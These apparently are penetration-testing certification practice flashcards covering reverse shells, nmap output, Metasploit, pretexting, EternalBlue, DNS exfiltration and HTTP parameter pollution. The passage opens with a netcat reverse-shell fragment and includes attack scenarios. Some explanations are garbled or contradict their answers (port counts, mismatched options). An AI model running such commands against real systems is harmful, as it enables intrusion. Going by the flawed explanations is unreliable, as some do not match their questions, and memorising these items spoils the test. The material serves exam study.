“10.1.2.2”. nc 10.1.2.6 4444 1>/tmp/fifo is incorrect because it attempts to establish an nc connection to the victim node that is, the victim is attempting to call itself rather than the attacking system. Since there would be no callback, there would be no reverse shell, making this answer incorrect.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q
Before beginning a physical penetration test, you decide to craft a persona wherein you are an electrician who has been asked to perform an inspection of the electrical panel and related systems for a client's building. What is this an example of?
A.Interrogation
B.Waterholing
C.Pretexting
D.Baiting
A

C.Pretexting

Explanation

Correct Answer:

Pretexting is correct. The crafting of a persona that is assumed during a social engineering effort-whether in person, over the phone, or via e-mail-is pretexting. It revolves around creating a reason-a pretext-for the penetration tester to be in a given place or to be asking for something.

Incorrect Answers:

Baiting is incorrect because baiting is a motivating factor defined by its use of means that tempt or entice a target into performing a given action.

Waterholing is incorrect because waterholing is the use of a trusted site to house a malicious payload.

Interrogation is incorrect because interrogation is the use of carefully asked questions to elicit information from a target.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q
Consider the following nmap output: ``` Nmap scan report for 10.1.2.3 Host is up (0.00034s latency). Not shown: 389 closed ports PORT STATE SERVICE 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 2049/tcp open nfs 5432/tcp open postgresql 5900/tcp open vnc Read data files from: /usr/bin/../share/nmap # Nmap done at Sat May 12 08:18:18 2018 -- 1 IP address (1 host up) scanned in 0.05 seconds ``` Based on this output, which of the following would have been a declared flag for this scan?
A.'--top-ports=11'
B.'-sV'
C.'--top-ports=400'
D.'-sU'
A

C.’–top-ports=400’

Explanation

Correct Answer:

--top-ports=400 is correct. The correct answer is --top-ports=400. The clue here is in the total count of ports listed as scanned; 11 open ports shown plus 389 closed ports not shown would mean that only 200 ports were probed in this scan.

Incorrect Answers:

--top-ports=11 is incorrect because --top-ports=11 would only account for the 11 open ports, and not the additional 389 ports that were scanned but found to not be open.

‘-sV’ is incorrect because the -sV flag is used to perform service identification in an nmap scan.

‘-sU’ is incorrect because the -sU flag is used to trigger UDP scanning of the target in question.`

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q
The Dalvik Virtual Machine (DVM) was the original runtime used for the execution of Java-based applications with their own process in Android. It was succeeded by what new runtime starting with Android 5.0?
A.OpenJRE
B.Android Runtime
C.Oracle JRE
D.Dalvik cache
A

B.Android Runtime

Explanation

Correct Answer: Android Runtime is correct. Android Runtime, or ART, is the current Java virtual machine implementation used in Android; it has been used since Android 5.0 (Lollipop).

Incorrect Answers:

Dalvik cache is incorrect because the Dalvik cache is a component of the Dalvik virtual machine. Unlike ART, which is primarily an “ahead-of-time” (AOT) virtual machine that compiles applications as soon as they are installed, Dalvik is a “just-in-time” (JIT) virtual machine, and the Dalvik cache hosts temporary compilations of apps for execution.

Oracle JRE and OpenJRE are incorrect because Oracle JRE and OpenJRE are Java environments consisting of virtual machines and related libraries for standard computer operating systems designed for laptops, desktop workstations, and servers.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q
In Censys results, which of the following is not a "quick filter" option?
A.Autonomous System
B.Hostname
C.Tag
D.Protocol
A

B.Hostname

Explanation

Correct Answer:

Hostname is correct. Censys does not offer a quick filter option to sort by hostname.

Incorrect Answers:

The other choices are incorrect because Censys features quick filter options named Protocol, Tag, and Autonomous System. Note that the question contains a negative modifier (“which of the following is not”); be on the lookout for such questions during the exam.

32
Q
The last step in threat modeling (per Microsoft's threat modeling process) is:
A.Rate the threats
B.Architecture overview
C.Document the threats
D.Identify assets
A

A.Rate the threats

Explanation

Correct Answers:

Rate the threats is correct. Rating the threats is the last step in Microsoft’s threat modeling framework. Rating threats is often very subjective to the client and the type of environment, but threats are usually assigned a general threat value, such as high, medium, or low. This may be accompanied by a numeric value derived from a simple formula, such as Risk = (Probability) * (Damage Potential).

Incorrect Answers:

Document the threats is incorrect because documenting threats is the fifth step in Microsoft’s threat modeling framework, and it consists of matching threats, threat actors, and vulnerabilities to possible targets within the organization’s own architecture.

Identify assets is incorrect because identifying assets is the first step, consisting of the definition of any organizational assets that are important to the successful execution of business functions or practices.

Architecture overview is incorrect because an architecture overview is the second step, and it is defined by a granular analysis of the various technologies in use in an organization’s architecture as well as the method by which they are implemented. Architecture overview is a critical step in threat modeling, as it makes the identification of threats much more manageable later in the process.

33
Q
On which port(s) does the Windows Remote Management interface listen?
A.TCP/135
B.TCP/139 and TCP/445
C.TCP/289 and TCP/636
D.TCP/5985 and TCP/5986
A

D.TCP/5985 and TCP/5986

Explanation

Correct Answer:

TCP/5985 and TCP/5986 is correct. The Windows Remote Management interface, or WinRM, listens on TCP ports 5985 and 5986, leveraging HTTP and HTTPS, respectively, for management actions.

Incorrect Answers:

TCP/389 and TCP/636 is incorrect because TCP ports 389 and 636 are the ports for LDAP and LDAPS (LDAP over SSL), respectively.

TCP/139 and TCP/445 is incorrect because TCP ports 139 and 445 are used for NetBIOS and SMB, respectively.

TCP/135 is incorrect because TCP/135 is used for Microsoft’s DCOM Service Control Manager.

34
Q
A big-box department store has acquired your services for a penetration test and has provided a checklist of regulatory requirements against which they need to verify their payment card systems for their stakeholders. You recognize that this client requires a \_\_\_\_\_\_\_\_\_\_ penetration test, and the framework relevant to this client is \_\_\_\_\_\_\_\_\_\_.
A.Compliance-base, HIPPA
B.goals-based, PCI-DSS
C.goals-based,HIPAA
D.compliance-based, PCI DSS
A

D.compliance-based, PCI DSS

Explanation

Correct Answer:

Compliance-based, PCI DSS is correct. Compliance-based testing generally involves a checklist of items to be verified or tested, as regulatory compliance necessarily involves strict adherence to a security baseline for a given security concern. Because the client in question is a department store, the regulatory framework is most likely to be PCI DSS, given the two possibilities. It is extremely unlikely that a department store will need to store patient health data.

Incorrect Answers:

Goals-based, PCI DSS and goals-based, HIPAA are incorrect because goals-based testing will have more general objectives for a penetration test that will be developed over the course of a meeting or meetings with the penetration testers; ready-made checklists tied to a regulatory requirement are a key indicator that compliance-based testing is in play.

Compliance-based, HIPAA is incorrect as well; given that the client in question is a big-box department store, the chance of them needing to comply with regulations that affect the storage and protection of patient health information is essentially zero. On the other hand, compliance with PCI DSS is a near certain requirement.

35
Q

For which of the following situations would it be most fitting to recommend a procedural mitigation strategy?
A.The organizations network environment runs on a flat topography, with all assets relying on the 172.16.x.x/12 network for internal communication
B.System-level firewalls are disabled, allowing unrestricted inbound and outbound access
C.System patches are applied at the whim of the owning manager, resulting in multiple disparate software versions and OS distributions requiring support from the server support team
D.During the course of the engagement, you manage to obtain password hashes on a server and determine that the local administrator password is valid on numerous other systems

A

C.System patches are applied at the whim of the owning manager, resulting in multiple disparate software versions and OS distributions requiring support from the server support team

Explanation

Correct Answer:

System patches are applied at the whim of the owning manager, resulting in multiple disparate software versions and OS distributions requiring support from the server support team is correct. The scenario described is indicative of a process failure specifically, the lack of a patch management plan to ensure consistency in the organization’s network environment. Implementation of a patch management plan will improve the client’s overall security posture through standardizing the environment and reducing the workload for staff systems administrators, in addition to providing logs of all patches installed on systems targeted for upgrades.During the course of the engagement, you manage to obtain password hashes on a server and determine that the local administrator password is valid on numerous other systems is incorrect because although a workflow process could be created to randomize system passwords, the core issue is best addressed by the randomization of passwords though tools such as LAPS.

Incorrect Answers:

The organization’s network environment runs on a flat topography, with all assets relying on the 172.16.x.x/12 network for internal communication is incorrect because while a properly established server build process could eliminate the possibility of future network segmentation issues, the existing network topography would be best fixed by a technological solution. Properly segmenting networks via traditional subnetting and VLAN assignments would be the most effective recommendation in this instance.

System-level firewalls are disabled, allowing unrestricted inbound and outbound access is incorrect because while a proper server build process could eliminate future issues, as just mentioned, it would do nothing for the existing vulnerabilities. In this case, the best course of action would be to develop and deploy effective firewall rules that ensure traffic goes where it is needed, and nowhere else.

36
Q
During a penetration test, port scans of a SCADA network inadvertently knock a number of target systems offline. Reaching out to the client to notify them of the issue and get them to remedy it is an example of what type of communication?
A.Situational awareness
B.De-escalation
C.Deconfliction
D.Stage-based
A

B.De-escalation

Explanation

Correct Answer:

De-escalation is correct. De-escalation communications exist to smooth out and eliminate crises and issues that may arise during a penetration test. These need not be issues that stem from testing activity; servers sometimes go down, IP address ranges might be mistyped into the RoE, or login credentials for a web application might not be valid as provided to the penetration tester. In cases such as these, a simple communique with the point of contact should be all that is necessary to get things moving along again.

Incorrect Answers:

Stage-based is incorrect because notifying the client of issues that arise during a penetration test is not in line with what is expected of stage-based (or milestone) communication triggers. Rather, milestone communication serves to inform the client organization of the progress of the engagement, letting them know what testing activities are currently underway and when new phases of the penetration test begin.

Deconfliction is incorrect because communication for the sake of deconfliction serves to identify the root causes of odd or unexpected behavior from systems or networks in the course of a penetration test. In the scenario described, the root cause is already known the SCADA network did not like the port scans so the deconfliction phase can be bypassed, and the penetration tester can move straight to the de-escalation phase with the client.

Situational awareness is incorrect because communication for the purposes of situational awareness may be broadly thought of as courtesy calls milestone communication often falls into this category of communication, as do regular status calls that occur during the course of a penetration test.

37
Q
Addressed by Microsoft Security Bulletin MS17-010, which exploit abuses the handling of certain packets by SMBv1 to achieve remote code execution?
A.Dirty COW
B.EternalBlue
C.EternalRed
D.HeartBleed
A

B.EternalBlue

Explanation

Correct Answer:

EternalBlue is correct. Addressed by Microsoft Security Bulletin MS17-010 and CVE-2017-0144, EternalBlue is capable of providing remote code execution on nearly all versions of Microsoft Windows that have not been patched, starting from 2000 SP0.

Incorrect Answers:

EternalRed is incorrect because EternalRed is a vulnerability that provides remote code execution in Samba, the GNU implementation of SMB. EternalRed is not addressed by MS17-010, making this answer incorrect.

Dirty COW is incorrect because Dirty COW (Copy-on-Write) is a Linux Kernel vulnerability that could be leveraged to achieve privilege escalation. Since the vulnerability listed in the question explicitly targets Windows systems, this is incorrect.

HeartBleed is incorrect because HeartBleed is a vulnerability in OpenSSL that could be used to steal web server private keys or user session cookies. Since HeartBleed is neither applicable to SMBv1 nor addressed by MS17-010, this answer is incorrect.

38
Q
Which command within the Metasploit Framework can integrate finished scan results from various automated tools to track targets, services, and other features of interest to a penetration tester?
A.'db_import'
B.'services'
C.'db_nmap'
D.'workspace'
A

A.’db_import’

Explanation

Correct Answer:

db_import is correct. db_import can be used to import output files from multiple automated scanners and other tools, integrating their data into the Metasploit Framework for tracking of hosts, IP addresses, discovered vulnerabilities, and identified account credentials.None of the other answers are used to integrate information into a Metasploit workspace from external sources.

Incorrect Answers:

‘workspace’ is incorrect because the workspace command is used to create, destroy, switch, and list the available workspaces within the Metasploit Framework, which is helpful in keeping environment data separated between different penetration testing engagements.

‘services’ is incorrect because the services command is used to add to, delete from, list, or search within the range of identified services running on hosts identified within a Metasploit Framework workspace.

‘db_nmap’ is incorrect because the db_nmap command is used to execute an nmap scan from within the Metasploit Framework, which will automatically incorporate its results into the workspace, tracking any discovered hosts and services as appropriate. Note that this differs from the correct answer in that, while it is importing nmap scan results, the scan is being conducted live rather than simply importing existing nmap output files.

39
Q

The WHOIS directory service provides what information with a proper query?

A.Website administrator contacts
B.Domain name resolution
C.Domain registration information
D.Reverse lookup

A

C.Domain registration information

Explanation

Correct Answer:

Domain registration information is correct. The WHOIS directory service provides domain registration information, including registrant and administrator names, phone numbers, and e-mail addresses.

Incorrect Answers:

Website administrator contacts is incorrect because website administrator information is not required for a WHOIS entry; that information can often be found on the website in question.

Domain name resolution and reverse lookup are incorrect because domain name resolution and reverse lookup services are both provided by DNS servers. Manual queries for this information may be completed via the use of the nslookup and dig commands.

40
Q
For which of the following services is Ettercap _not_ able to sniff usernames and passwords without performing a man-in-the-middle attack on SSL or another data encryption method?
A.HTTP
B.FTP
C.LDAP
D.SSH2
A

D.SSH2

Explanation

Correct Answer:

SSH2 is correct. Ettercap is able to sniff usernames and passwords for SSH1, but not for SSH2.

Incorrect Answers

The other choices are incorrect as individual answers. Passwords for FTP, HTTP, and LDAP can all be sniffed out by Ettercap out of the box, but be careful here: note that these choices specifically address versions of these services that are not secured via SSL (that is, HTTPS and LDAPS) or tunneled through an SSH connection (that is, SFTP). Such distinctions can seem trivial, but a single letter is all it takes to make an answer incorrect. Read each question and answer carefully during the exam to avoid these potential snags. The only single correct answer to this question is the one that says “All of the answers are correct.”

41
Q
A vulnerability discovered in 2012 found that attackers could take control of another user's blog by sending a specially crafted POST request:```security_token=&blogID=&blogID=&authorsList=&ok=Invite```This is an example of what type of vulnerability?
A.Directory traversal
B.Session hijacking
C.SQL Injection
D.HTTP parameter pollution
A

D.HTTP parameter pollution

Explanation

Correct Answer:

HTTP parameter pollution is correct. HTTP parameter pollution is a type of application fuzzing that specifically tests how a website handles multiple HTTP parameters with the same name; in the given example, notice that there are two instances of the blogID parameter. The flaw here was in the server-side authentication mechanism, as the authentication check was performed using the first instance of the blogID parameter (that is, the blogID parameter owned by the attacker), while the operation performed used the second instance (which pointed to the victim’s blog). Different web servers will handle multiple identically named HTTP parameters differently, and the results of parameter pollution can range from simple error messages to authentication or input validation bypasses. HTTP parameter pollution is generally a complex enough issue that it must be tested manually.

Incorrect Answers:

Session hijacking is incorrect because session hijacking occurs when an attacker has obtained an authenticated user’s session token for example, from a cross-site scripting attack. Since the attack described does not involve theft of a user’s session token, this answer is incorrect.

Directory traversal is incorrect because directory traversal occurs when inadequate controls are placed on user input in an application, resulting in the attacker being able to see files outside of the scope of their authorized access. In some cases, this may mean access to files or data belonging to other users of a web application; in more extreme circumstances, it may mean access to any file on a host system or server. As the example listed references tampering with HTTP parameters rather than attempting to access other directories on the web server (such as through the use of repeated ../ character values in the URL), directory traversal cannot be correct.

SQL injection is incorrect because SQL injection occurs when user input is not filtered or sanitized before being used to create a SQL database query, allowing an attacker or malicious user to perform operations outside of the scope of the intent of the SQL query in question. SQL injection is best mitigated through the user of parameterized queries that is, a SQL query that consists of placeholders in a previously prepared SQL statement, where the values of those parameters are fed to the query at runtime. As the example listed in the question consists of tampering with an HTTP request (rather than tampering with SQL queries sent to a system), SQL injection cannot apply and is therefore an incorrect choice.

42
Q
During a physical penetration test, you determine that a facility has a guard rotation at the front desk every 30 minutes, is surrounded by an eight-foot-tall chain link fence, and also has a door that is often left propped open at the rear. You also notice that the company's garbage dumpsters are stored outside of the fenced-off perimeter, and that there are only two cameras, both of which are trained on the front door. Which of the following is a likely good method to gain access to this facility after business hours?
A.Tailgating
B.Dumpster diving
C.Fence jumping
D.Pretexting
A

C.Fence jumping

Explanation

Correct Answer:

Fence jumping is correct. Fence jumping is used to obtain unauthorized access to an area that has been cordoned off. In the broadest sense, it effectively describes methods used to entirely bypass access control mechanisms. In the scenario described, since the front of the building is visibly guarded by personnel and monitored by cameras, the path of least resistance to ingress would be jumping the fence in the back of the facility and then heading for the open door.

Incorrect Answer:

Tailgating is incorrect because tailgating would be a poor choice to gain ingress after normal business hours, since the likelihood of a justified reason for someone’s presence is much lower. This presents two problems in this scenario: First, the tester would need to find someone who was heading into the building after hours. Second, the tester would need to be able to convince that individual that they were authorized to be onsite, which is made more difficult given the time of day and the increased chances of interaction when there are no other people around.

Pretexting is incorrect because pretexting is the practice of crafting a persona that is assumed during a social engineering effort, rather than a tactic used to obtain ingress to a facility or secured location.

Dumpster diving is incorrect because dumpster diving is an effort to obtain sensitive information that has been thrown away rather than an attempt to obtain ingress to a secured facility. In the example given, the company’s dumpsters are held outside of the fenced-off perimeter, so no breach of the perimeter is necessary for dumpster diving here.

43
Q
Popularly exploited by the Conficker worm, which vulnerability relies on a buffer overflow in the Microsoft Server service to achieve remote code execution on Windows 2000, XP, and Server 2003?
A.MS08-067
B.DoublePulsar
C.MS15-127
D.EternalSynergy
A

A.MS08-067

Explanation

Correct Answer:

MS08-067 is correct. MS08-067 describes the vulnerability at the heart of the Conficker worm and relies on a buffer overflow in the Windows Server service, which handles remote procedure calls.

Incorrect Answer:

DoublePulsar is incorrect because DoublePulsar is a backdoor implant payload frequently used with other exploits, rather than a vulnerability.

EternalSynergy is incorrect because EternalSynergy is an exploit (rather than a vulnerability) that targets SMBv1 with a buffer overflow to achieve code execution.

MS15-127 is incorrect because MS15-127 is a vulnerability that targets Microsoft DNS rather than its Server service to achieve remote code execution; in addition, MS15-127 was not leveraged by the Conficker worm.

44
Q
The National Vulnerability Database maintained by NIST is a fantastic resource for analysis on vulnerabilities that have been published to the CVE Dictionary but can be lacking in the granularity and detail helpful for organizations providing security assessments of written code. Which of the following is a better public resource for information pertaining to application security weaknesses that are not public knowledge, are related to undisclosed CVEs, or have been identified during the early stages of the application development phase?
A.MITRE
B.CWE
C.Full Disclosure
D.CAPEC
A

B.CWE

Explanation

Correct Answer:

CWE is correct. The Common Weakness Enumeration is a list of common security weaknesses and mitigations for the same that can help support secure coding practices and software design. It can be a great resource for dealing with newly discovered vulnerabilities, whether approaching them as a defender or a penetration tester

Incorrect Answers:

CAPEC and full disclosure are incorrect because while both CAPEC and Full Disclosure are publicly available resources for vulnerability research, they serve different purposes than CWE. Where CWE analyzes vulnerability patterns and identifies common weaknesses, CAPEC (Common Attack Pattern Enumeration and Classification) analyzes patterns in attacking vulnerabilities, rather than patterns in vulnerabilities and software weaknesses directly.

Full Disclosure is a public, vendor-neutral form for more detailed discussion of discovered vulnerabilities and exploitation techniques; if a vulnerability is found on Full Disclosure, it should be understood to be widely known, or at least imminently so.

MITRE is incorrect because MITRE is an organization that conducts and publishes security research, rather than an established resource where that research information may be found.

45
Q
During a penetration test, you set up a mass text message alert to employees with cell phones provided by the client organization that links to a malicious website designed to look like the company's internal news site. What is this an example of?
A.Interrogation
B.Pretexting
C.SMS Phishing
D.Whaling
A

C.SMS Phishing

Explanation

Correct Answer:

SMS phishing is correct. The use of text messages with malicious links is a standard example of SMS phishing.

Incorrect Answers:

Whaling is incorrect because whaling is a specific subtype of phishing attack that targets individuals for whom compromise would have devastating effects on the target organization. Individuals usually targeted in whaling attacks are systems administrators and company corporate-level employees.

Interrogation is incorrect because interrogation is the use of carefully asked questions to elicit information from a target.

Pretexting is incorrect because pretexting is the creation of a reason a pretext for the penetration tester to be in a given place or to be asking for something.

46
Q
A request from a client that you "take a look" at some additional server configurations after the terms of the penetration test have already been laid out in a contract is an example of what?
A.Compliance-based testing
B.Scope creep
C.Target selection
D.Threat modeling
A

B.Scope creep

Explanation

Correct Answer:

Scope creep is correct. Scope creep is the addition to or modification of an agreed-upon, contracted target scope within an SOW. Scope creep can seem innocuous or even flattering “Wow, they want me to do more work for them!” but you must bear in mind that as a penetration tester, you are providing a service. Bakers do not make extra cupcakes for customers simply because they’re asked nicely they expect to be paid for the goods and services they provide. Similarly, a penetration tester should expect compensation for the service they provide an organization. If asked to provide a service beyond that agreed upon in the MSA or SOW, feel free to request further compensation to do so, or decline the request.

Incorrect Answers:

Compliance-based is incorrect because compliance-based testing gauges an organization’s implementation and adherence to a given set of security standards that is, a regulatory compliance framework defined for a given environment. Examples of such regulatory compliance frameworks include Payment Card Industry (PCI), Health Insurance Portability and Accountability Act (HIPAA), and Federal Information Security Management Act (FISMA).

Threat modeling is incorrect because threat modeling is the process by which risks associated with an organization’s information systems are identified, quantified, and addressed.

Target selection is incorrect because target selection is a process performed during the scoping phase of an engagement; it Is how the hosts, systems, and networks subject to a penetration test are identified and defined.

47
Q

During a penetration test, you identify a mail server as an open relay. Which of the following would be the best way to leverage this during the rest of the engagement?
A.Attempting to intercept email traffic as it gets routed to the relay
B.Checking the relay for vulnerability to Shellshock
C.Flooding the relay with messages to perform a DoS attack to force the organization to use another, less secure communications method
D.Spoofing a corporate user to send phishing emails to high-value targets in the organization

A

D.Spoofing a corporate user to send phishing emails to high-value targets in the organization

Explanation

Correct Answer:

Spoofing a corporate user to send phishing e-mails to high-value targets in the organization is correct. Open SMTP relays will accept and process messages from all users without authentication. This allows an attacker to send e-mails as any user to any other e-mail address, which would be a great boon during a phishing campaign.

Incorrect Answers:

Checking the relay for vulnerability to Shellshock is incorrect because nothing in the question indicates a version of SMTP that might be vulnerable to Shellshock.

Attempting to intercept e-mail traffic as it gets routed to the relay is incorrect because open relays allow users to send messages without authentication, not read them.

Flooding the relay with messages to perform a DoS attack to force the organization to use another, less secure communications method is incorrect because a DoS attack of an e-mail relay is unlikely to produce a response other than a firewall rule that blocks traffic from the attacking IP (sometimes referred to as “blackholing” malicious traffic). In addition, DoS attacks are generally not likely to be useful or welcome during a penetration test, as they disrupt legitimate users without providing any other meaningful data. Potential vulnerability to a DoS attack should still be registered as a finding in a penetration test report, however.

48
Q
During a penetration test, you determine that there are very few ports available for movement and data transfer that are not being blanket denied by the target organization's firewalls. You elect to smuggle data out of the target network by embedding it into DNS requests. This is an example of what ATT&CK technique?
A.Exfiltration over alternative protocol
B.Process discovery
C.Exfiltration over physical medium
D.Data from removable media
A

A.Exfiltration over alternative protocol

Explanation

Correct Answers:

Exfiltration over alternative protocol is correct. The use of DNS as an exfiltration vector abuses the necessity of legitimate DNS traffic in a network, allowing for data to be taken from a target system.

Incorrect Answers:

Exfiltration over physical medium is incorrect because exfiltration over a physical medium would be best represented by transferring stolen data to removable media, such as USB drives or cell phones, rather than through abuse of a network protocol, as in the example.

Process discovery is incorrect because process discovery is a discovery tactic unrelated to data exfiltration.

Data from removable media is incorrect because data from removable media refers to a data collection tactic rather than anything related to data exfiltration.

49
Q

During a penetration test, you obtain read/write access to a DNS server. How could this be used to your advantage during the engagement? (Choose two.)
A.Modifying all DNS IP values to 127.0.0.1 to effectively deny network access to users and systems reliant on name resolutions
B.Obtaining a dump of all extant DNS entries for further enumeration and identification of additional high-value targets within the testing scope
C.Modifying one or more DNS values to point to a system under the attackers control
D.Adding a few lines of code that return user cookies via cross-site scripting

A

B.Obtaining a dump of all extant DNS entries for further enumeration and identification of additional high-value targets within the testing scope
C.Modifying one or more DNS values to point to a system under the attackers control

Explanation

Correct Answers:

Modifying one or more DNS values to point to a system under the attacker’s control is correct because by modifying DNS to point to systems under the attacker’s control, the attacker is able to exploit user trust of their browser or other tools and effectively trick them into loading assets and resources other than those they were intending to access. This could be used to effect client-side browser attacks or man-in-the-middle attacks where the attacker can obtain credentials or other sensitive information.

Obtaining a dump of all extant DNS entries for further enumeration and identification of additional high-value targets within the testing scope is correct because information is arguably a penetration tester’s best friend. Enumeration of additional information can only improve the results of a penetration test in this case, a full list of system names and IP addresses would be exceedingly valuable to a penetration tester, as organizations often use descriptive naming schemes when standing up new servers or network devices.

Incorrect Answers:

Modifying all DNS IP values to 127.0.0.1 to effectively deny network access to users and systems reliant on name resolution is incorrect because pointing all name resolution requests to 127.0.0.1 would be noticed as soon as servers and systems needed to make a new DNS request, which would be likely to incur administrator or defender investigation or action. Moreover, this would be an action that could easily disrupt all normal business operations within that DNS zone in the course of a penetration test, marking it as something well outside of the boundaries of what a penetration tester should do; a penetration tester should only go as far as is necessary to demonstrate vulnerability. In this scenario, being able to modify DNS records can be proven with a few simple screen captures.

Adding a few lines of code that return user cookies via cross-site scripting is incorrect because DNS does not serve web pages; rather, it translates the human-readable URLs of targets a user wishes to access into machine-readable IP addresses. As such, it would be unable to deliver an XSS payload directly to a potential target.

50
Q
Consider the following nmap output: ``` Nmap scan report for 10.1.2.3 Host is up (0.00034s latency). Not shown: 389 closed ports PORT STATE SERVICE 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 2049/tcp open nfs 5432/tcp open postgresql 5900/tcp open vnc Read data files from: /usr/bin/../share/nmap # Nmap done at Sat May 12 08:18:18 2018 -- 1 IP address (1 host up) scanned in 0.05 seconds ``` Assuming standard ports and options are in use, which of the following options would be a good flag to add for additional scans to further enumerate the service running on port 2049?
A.'--script=pgsql-brute'
B.'--script==http-enum'
C.'--script=telnet*'
D.'--script=nfs-*'
A

D.’–script=nfs-*’

Explanation

Correct Answer:

--script=nfs-* is correct. In this case, --script=nfs-* would be most useful for further enumeration of port 2049, given standard ports. One helpful feature of nmap is its support for wildcard characters. In the sample listed here, --script=nfs-* would call all scripts with names beginning with nfs-. In this case, one would expect to see the scripts nfs-ls, nfs-showmount, and nfs-statfs loaded. None of the other options would affect port 2049 given the use of standard ports.

Incorrect Answers:

--script=pgsql-brute is incorrect because --script=pgsql-brute would be expected to run against port 5432, which is a standard port used for PostgreSQL.

--script=http-enum is incorrect because --script=http-enum would be expected to run against port 80, the standard port for HTTP.

--script=http-telnet is incorrect because --script=telnet* would be expected to run against port 23, the standard port for telnet.

51
Q
One of the strengths of Maltego is its ability to build and illustrate relationships between various identifiers. Which of the following is not a data type that can be tracked by Maltego?
A.Names
B.Social media accounts
C.Web sites
D.Search engine history
A

D.Search engine history

Explanation

Correct Answer:

Search engine history is correct. Search engine history is not a data type tracked by Maltego, making it the correct answer. Tracking of search engine history would require direct access to a computer or account used by a targeted individual. Because this would be a means of active information gathering and because Maltego is an open-source information collection framework, we can conclude that Maltego does not account for this data type. Pay close attention to questions that use negative modifiers like “not” and “no.”

Incorrect Answers: Names, social media accounts, and websites are all data types that may be tracked by Maltego, making them incorrect answers.

52
Q

For which of the following situations would it be most fitting to recommend a technological mitigation strategy?
A.During a post-engagement debrief, the client indicates that a number of issues identified in your assessment are scheduled to be fixed by systems administrators, but the work log has been backed up for a number of weeks
B.You are able to convince a system administrtator to create a new user account for you via email, claiming that you are a new hire
C.Surveillance of the client facility shows that no guards are on duty from 11PM to 8AM
D.During the course of the engagement, y ou manage to obtain password hashes on a server and determine that the local administrator password is valid on numerous other systems

A

D.During the course of the engagement, y ou manage to obtain password hashes on a server and determine that the local administrator password is valid on numerous other systems

Explanation
Correct Answer:

During the course of the engagement, you manage to obtain password hashes on a server and determine that the local administrator password is valid on numerous other systems is correct. In the scenario described, the client organization is reusing the same password for local administrative accounts. Because the best mitigation recommendation in this situation is the use of a service such as LAPS, which randomizes local administrative account passwords, this is the scenario for which it is most fitting to recommend a technological mitigation strategy.

Incorrect Answers:

You are able to convince a systems administrator to create a new user account for you via e-mail, claiming that you are a new hire is incorrect because a lack of security guards indicates inadequate staffing, which would suggest that the onboarding of additional staff is appropriate. Because this mitigation strategy revolves around people rather than technology, this answer is incorrect.

You are able to convince a systems administrator to create a new user account for you via e-mail, claiming that you are a new hire is incorrect because being able to trick a systems administrator into creating a user account is indicative of a lack of an effective onboarding process.

Because the recommended mitigation strategy here would be procedural rather than technological, this answer is also incorrect. During a post-engagement debrief, the client indicates that a number of issues identified in your assessment are scheduled to be fixed by systems administrators, but the work log has been backed up for a number of weeks is incorrect because a workload backlog preventing administrators from being able to effectively address issues on all systems in the organization’s network would likely be indicative of a personnel issue rather than a failure in processes or technology.

53
Q
The ModBus communication protocol associated with SCADA systems typically operates on which port?
A.636
B.22
C.502
D.8080
A

C.502

Explanation
Correct Answer:

502 is correct. The ModBus communication protocol is most commonly found operating on port 502.

Incorrect Answer:

636 is incorrect because port 636 is associated with the Lightweight Directory Access Protocol over SSL (LDAPS). LDAP (and its TLS/SSL secured form LDAPS) is an open and vendor-neutral application protocol that maintains distributed directory information services over the network.

22 is incorrect because port 22 is registered for SSH, or Secure Shell. SSH enables secure, encrypted access for network services over even an unsecured network.

8080 is incorrect because port 8080 is most commonly associated with HTTP as an alternative port for web traffic.

54
Q

In iOS applications, what is the net effect of App Transport Security (ATS) being enabled?
A.Forces mobile applications to use HTTPS
B.Forces verfication of the logical address of the remote server with which application communicates
C.Requires the user to enter a PIN or password to use the devices network connection
D>Ensures that data is encrypted with the bcrypt algorithm before data is sent

A

A.Forces mobile applications to use HTTPS

Explanation
Correct Answer: Forces mobile applications to use HTTPS is correct. The App Transport Security feature of iOS ensures that mobile applications use HTTPS for communication with remote systems.

Incorrect Answers:

Requires the user to enter a PIN or password to use the device’s network connection is incorrect because the requirement for a PIN or password is a user-configurable security enhancement for the user interface.

Ensures that data is encrypted with the bcrypt algorithm before data is sent is incorrect because bcrypt is an algorithm used for encryption at rest; computing a bcrypt hash is computationally expensive, meaning it would be impractical to use for ongoing system communications due to the frequency of encryption operations in such a scenario.

Forces verification of the logical address of the remote server with which the application communicates is incorrect because verification of the logical address (that is, the IP address) of a remote server is a function of DNS (when not provided an IP address directly), which converts human readable domain names to IP addresses.

55
Q
A real-time operating system (RTOS) is a stripped-down, bare-bones version of a commonly deployed operating system. Which of the following is not an example of an RTOS?
A.LynxOS
B.RTLinux
C.Windows CE
D.Solaris
A

D.Solaris

Explanation
Correct Answer:

Solaris is correct. Solaris is a standard, full-featured operating system family managed and developed by Oracle.

Incorrect Answers:

The other answers are incorrect because RTLinux, Windows CE, and LynxOS are all real-time operating systems. RTLinux is a hard RTOS developed first by FSMLabs and later by Wind River Systems. Windows CE (Embedded Compact) is a hard RTOS member of the Windows operating system family designed by Microsoft for its Windows Embedded product family. LynxOS is a hard RTOS developed by Lynx Software Technologies for use in various industries, including aviation, military hardware components, and industrial control applications.

56
Q
Explicit declaration of the purpose and scope of a penetration test, the location or locations where testing is to be conducted, timeframes during which testing may be conducted, and due dates for deliverables are commonly found in which pre-engagement contractual document?
A.Master service agreement
B.Rules of engagement
C.Statement of Work
D.Nondisclousre agreement
A

C.Statement of Work

Explanation
Correct Answer:

Statement of work is correct. The items detailed in the question are frequent elements found in a statement of work, or SOW. Other items found in the SOW may include (but are not limited to) applicable industry standards, acceptance criteria, payment scheduling (likely derived from the overarching MSA), and other special requirements such as travel or required certifications and clearances.

Incorrect Answers:

Master service agreement is incorrect because a master service agreement (MSA) is a contract between two or more parties that lays out the granular details of future transactions and agreements, typically addressing conditions such as (but not limited to) payment terms and scheduling, intellectual property ownership, and allocation of risk.

Nondisclosure agreement is incorrect because a nondisclosure agreement (NDA) is a confidentiality agreement that protects the proprietary information and intellectual property of a business.

